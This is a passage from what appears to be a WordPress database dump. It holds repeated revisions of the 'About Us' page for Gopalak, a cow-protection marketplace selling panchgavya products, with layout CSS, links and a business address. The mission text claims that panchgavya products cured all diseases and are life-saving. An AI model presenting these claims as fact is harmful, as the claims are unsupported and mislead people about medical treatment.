100%;\n    height: 100%;\n    background: #43693F;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-10-20 17:06:09','2022-10-20 11:36:09','',1172,'https://gopalak.in/?p=1940',0,'revision','',0),(1942,1,'2022-10-20 17:40:07','2022-10-20 12:10:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:40:07','2022-10-20 12:10:07','',1804,'https://gopalak.in/?p=1942',0,'revision','',0),(1943,1,'2022-10-20 17:40:07','2022-10-20 12:10:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:40:07','2022-10-20 12:10:07','',1804,'https://gopalak.in/?p=1943',0,'revision','',0),(1944,1,'2022-10-20 17:40:07','2022-10-20 12:10:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:40:07','2022-10-20 12:10:07','',1804,'https://gopalak.in/?p=1944',0,'revision','',0),(1945,1,'2022-10-20 17:40:29','2022-10-20 12:10:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" 